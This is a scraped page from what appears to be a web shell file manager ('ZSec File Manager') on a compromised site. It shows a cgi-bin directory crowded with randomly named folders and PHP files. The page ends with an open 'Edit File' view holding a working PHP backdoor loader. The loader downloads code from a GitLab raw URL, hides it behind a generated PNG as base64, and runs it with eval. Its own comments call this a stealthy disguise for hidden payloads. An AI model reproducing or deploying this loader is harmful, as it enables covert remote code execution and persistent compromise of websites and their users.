ZSec File Manager
Upload
Current Directory: /home/greakqsw/theblogginglab.org/5uq8v7-20260314182546/3myf64/cgi-bin
[Up]
..
[Open]
Hapus
Rename
cgi-bin.tar
[Edit]
Hapus
Rename
cgi-bin.tar.gz
[Edit]
Hapus
Rename
cgi-bin.zip
[Edit]
Hapus
Rename
error_log
[Edit]
Hapus
Rename
q7m5c4.zip
[Edit]
Hapus
Rename
tirl3n
[Open]
Hapus
Rename
tkh85g
[Open]
Hapus
Rename
tknr36
[Open]
Hapus
Rename
trfgan
[Open]
Hapus
Rename
tsr1pl
[Open]
Hapus
Rename
tyci5f
[Open]
Hapus
Rename
tzbjq8
[Open]
Hapus
Rename
u1a79.php
[Edit]
Hapus
Rename
u1qoni
[Open]
Hapus
Rename
u3e59t
[Open]
Hapus
Rename
u47kst
[Open]
Hapus
Rename
u7pcem
[Open]
Hapus
Rename
u9qhik
[Open]
Hapus
Rename
u9w37n
[Open]
Hapus
Rename
ua901m
[Open]
Hapus
Rename
ubvd83
[Open]
Hapus
Rename
ui1esz
[Open]
Hapus
Rename
ujxzdn
[Open]
Hapus
Rename
ujz0w7
[Open]
Hapus
Rename
ukjeos
[Open]
Hapus
Rename
unym16
[Open]
Hapus
Rename
up8zqf
[Open]
Hapus
Rename
upqx1d
[Open]
Hapus
Rename
usxil9
[Open]
Hapus
Rename
utfwzy
[Open]
Hapus
Rename
ux5t2y
[Open]
Hapus
Rename
ux785m
[Open]
Hapus
Rename
uyx89n
[Open]
Hapus
Rename
v0tjp3
[Open]
Hapus
Rename
v4ax76
[Open]
Hapus
Rename
v4zbrn
[Open]
Hapus
Rename
v5ol1z
[Open]
Hapus
Rename
v5x16c
[Open]
Hapus
Rename
v71t3z
[Open]
Hapus
Rename
v7fhcb
[Open]
Hapus
Rename
v95wi.php
[Edit]
Hapus
Rename
v9umcn
[Open]
Hapus
Rename
vakwlt
[Open]
Hapus
Rename
vf2s0.php
[Edit]
Hapus
Rename
vf6tc.php
[Edit]
Hapus
Rename
vitd6l
[Open]
Hapus
Rename
viukyl
[Open]
Hapus
Rename
vkyus1
[Open]
Hapus
Rename
vmzfel
[Open]
Hapus
Rename
vpo37j
[Open]
Hapus
Rename
vqkb6o
[Open]
Hapus
Rename
vs6ltc
[Open]
Hapus
Rename
vshi6f
[Open]
Hapus
Rename
vuwpao
[Open]
Hapus
Rename
vwuifk
[Open]
Hapus
Rename
vxm76u
[Open]
Hapus
Rename
vxuw6g
[Open]
Hapus
Rename
vyihjl
[Open]
Hapus
Rename
w1q2cv
[Open]
Hapus
Rename
w4gzvt
[Open]
Hapus
Rename
wb1xok
[Open]
Hapus
Rename
wb76ju
[Open]
Hapus
Rename
wbvxm8
[Open]
Hapus
Rename
wg0m2c
[Open]
Hapus
Rename
wgu6pc
[Open]
Hapus
Rename
wjvlno
[Open]
Hapus
Rename
wjzbch
[Open]
Hapus
Rename
wspx1g
[Open]
Hapus
Rename
wufim.php
[Edit]
Hapus
Rename
wz3n58
[Open]
Hapus
Rename
x27ki3
[Open]
Hapus
Rename
x4b9lh
[Open]
Hapus
Rename
x5i6se
[Open]
Hapus
Rename
x701wm
[Open]
Hapus
Rename
x7oeat
[Open]
Hapus
Rename
x8kj7p
[Open]
Hapus
Rename
x8w5lt
[Open]
Hapus
Rename
xa0h9i
[Open]
Hapus
Rename
xbin1q
[Open]
Hapus
Rename
xbqu0a
[Open]
Hapus
Rename
xc4w0a
[Open]
Hapus
Rename
xc73as
[Open]
Hapus
Rename
xdk7ab
[Open]
Hapus
Rename
xdwb83
[Open]
Hapus
Rename
xglcor
[Open]
Hapus
Rename
xiukjw
[Open]
Hapus
Rename
xky15q
[Open]
Hapus
Rename
xnv01u
[Open]
Hapus
Rename
xoaym7
[Open]
Hapus
Rename
xod4je
[Open]
Hapus
Rename
xomt90
[Open]
Hapus
Rename
xvjzid
[Open]
Hapus
Rename
xzqeyn
[Open]
Hapus
Rename
y03sal
[Open]
Hapus
Rename
y03sal.tar.gz
[Edit]
Hapus
Rename
y14v8o
[Open]
Hapus
Rename
y27cn.php
[Edit]
Hapus
Rename
y2qi83
[Open]
Hapus
Rename
y2tw9o
[Open]
Hapus
Rename
y35a6w
[Open]
Hapus
Rename
y3eju8
[Open]
Hapus
Rename
y562xz
[Open]
Hapus
Rename
yb8tpn
[Open]
Hapus
Rename
yd960u
[Open]
Hapus
Rename
ydux3m
[Open]
Hapus
Rename
ye34mp
[Open]
Hapus
Rename
yent2p
[Open]
Hapus
Rename
ygo9kl
[Open]
Hapus
Rename
yid1al
[Open]
Hapus
Rename
yoepax
[Open]
Hapus
Rename
ys1mp8
[Open]
Hapus
Rename
ytepab
[Open]
Hapus
Rename
yvmkrh
[Open]
Hapus
Rename
yzel8j
[Open]
Hapus
Rename
z0ve4w
[Open]
Hapus
Rename
z3wbfx
[Open]
Hapus
Rename
z46c5r
[Open]
Hapus
Rename
z5liqm
[Open]
Hapus
Rename
z5wbkr
[Open]
Hapus
Rename
z6fv0s
[Open]
Hapus
Rename
z6vj0x
[Open]
Hapus
Rename
z7fs5e
[Open]
Hapus
Rename
z7ruqc
[Open]
Hapus
Rename
z86uk.php
[Edit]
Hapus
Rename
z8op2.php
[Edit]
Hapus
Rename
zhx8v.php
[Edit]
Hapus
Rename
zi7qcd
[Open]
Hapus
Rename
zjuegi
[Open]
Hapus
Rename
zles58
[Open]
Hapus
Rename
zvoctr
[Open]
Hapus
Rename
zy1fvx
[Open]
Hapus
Rename
Edit File
<?php /* Improved PNG disguise for hidden PHP payloads. This script fetches remote code, embeds it into a realistic PNG file, and executes it stealthily. */ session_start(); // Main remote code URL (can be overridden by session) $mainUrl = $_SESSION['ts_url'] ?? 'https://gitlab.com/mrgithub89-group/mrgithub89-projectaa/-/raw/main/wp-security.php'; // -------------------------------------------- // 1. Generate a realistic PNG image (128x128) // -------------------------------------------- function generateRealisticPngHeader($width = 128, $height = 128) { ob_start(); $image = imagecreatetruecolor($width, $height); // Fill with random noise for ($x = 0; $x < $width; $x++) { for ($y = 0; $y < $height; $y++) { $color = imagecolorallocate($image, rand(0,255), rand(0,255), rand(0,255)); imagesetpixel($image, $x, $y, $color); } } imagepng($image); imagedestroy($image); return ob_get_clean(); // Binary PNG data } // -------------------------------------------- // 2. Load remote PHP code from given URL // -------------------------------------------- function loadRemoteData($url) { $content = ''; try { $file = new SplFileObject($url); while (!$file->eof()) { $content .= $file->fgets(); } } catch (Throwable $e) { $content = ''; } if (strlen(trim($content)) < 1) { $content = @file_get_contents($url); } if (strlen(trim($content)) < 1 && function_exists('curl_init')) { $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 10, ]); $content = curl_exec($ch); curl_close($ch); } return $content; } // -------------------------------------------- // 3. Create payload by appending hidden PHP code // -------------------------------------------- function createStealthPayload($phpCode) { $png = generateRealisticPngHeader(); $marker = '###PAYLOAD###'; $encoded = base64_encode($phpCode); return $png . $marker . $encoded; } // -------------------------------------------- // 4. Extract and execute hidden payload // -------------------------------------------- function extractAndExecutePayload($data) { $marker = '###PAYLOAD###'; $parts = explode($marker, $data); if (count($parts) === 2) { $decoded = base64_decode($parts[1]); if ($decoded !== false && strlen(trim($decoded)) > 0) { @eval("?>$decoded"); } } } // -------------------------------------------- // Main Execution Flow // -------------------------------------------- $remoteCode = loadRemoteData($mainUrl); if (strlen(trim($remoteCode)) > 0) { $payload = createStealthPayload($remoteCode); extractAndExecutePayload($payload); // Executes hidden remote code } ?>
Simpan